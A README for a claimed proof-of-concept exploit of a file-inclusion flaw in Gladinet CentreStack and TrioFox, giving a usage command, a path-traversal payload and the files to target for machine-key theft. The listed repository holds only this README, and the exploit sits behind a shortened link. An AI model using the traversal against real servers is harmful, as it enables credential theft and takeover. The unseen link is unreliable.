# CVE-2025-11371
### Overview
This repository contains a proof-of-concept exploit for CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability in Gladinet CentreStack and TrioFox. The exploit allows remote retrieval of sensitive system files, such as the Web.config, which can expose machine keys leading to further RCE via deserialization flaws like CVE-2025-30406.
Affected versions: All versions up to and including 16.7.10368.56560.
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`
Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### How It Works
The vulnerability stems from improper input validation in the UploadDownloadProxy component's temp handler. The exploit crafts a specially formed request to the endpoint, appending traversal sequences to reach outside the web root.
### Proof of Concept
Tested against a default CentreStack setup on Windows Server 2019. Successful file reads include:
- Web.config (machine key disclosure)
- Machine.config
- Sensitive logs in %PROGRAMDATA%
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-11371 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC Exploit - [href](https://tinyurl.com/2jkebbrv)
For any inquiries, please email me at: evilforti@hotmail.com
[4.0K] /data/pocs/35f68d3da182b556f05cf1d20ea0e3254af84da0
└── [1.9K] README.md
1 directory, 1 file